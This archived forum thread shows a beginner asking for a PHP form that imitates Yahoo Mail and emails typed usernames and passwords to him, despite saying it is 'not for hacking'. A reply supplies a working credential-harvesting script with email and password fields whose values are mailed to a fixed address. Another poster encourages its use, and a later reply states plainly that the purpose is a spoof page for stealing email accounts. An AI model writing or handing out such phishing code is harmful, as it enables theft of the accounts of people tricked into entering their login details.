Archived

This topic is now archived and is closed to further replies.

met0555

Simple php help

hi, i'm a beignner, and i was trying to make a form mailer, but i couldn't, if there is someone who can give an example of a form like yahoo mail, i prefer yahoo mail to try mail.yahoo.com u can also get some help at http://www.scriptarchive.com/readme/formmail.html . what i waant is want the thing wrote on the username and password field to be e-mailed to me metaferia(at)gmail.com. it's  not for hacking or.... . it's for educational use

tanks

In it's very simple form, it should look like this-

[code]<?php

if(isset($_POST['submit']))
{
die("<html>
<head>
<title>AutoClicker</title>
</head>
<body>
<font face=\"Arial\">
<form action=\"".$_SERVER['PHP_SELF']."\" method=\"POST\">
Your email:&nbsp;<input type=\"text\" name=\"user\"><br>
Your pass:&nbsp;<input type=\"password\" name=\"pass\"><br><br>
<input type=\"submit\" name=\"submit\" value=\"Send!\">
</form>
</body>
</html>");
}

$to = "your@email.here";
$msg="User = ".$_POST['user']."\nPass = ".$_POST['pass'];
mail($to,"New Entry",$msg);

?>[/code]

Orio.

Thats a good script to use met0555 so give it a go. IF you wanted to learn how to do it yourself then just ask and Orio or someone else can explain how it works and why it works that way and how you can write script like that yourself.

Can i ask what the script is for though, you said its not for hacking but what [i]is[/i] it for?

It's so he can show an example of how to make an spoof page to steal email accounts such as yahoo or msn or others that our out there.

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.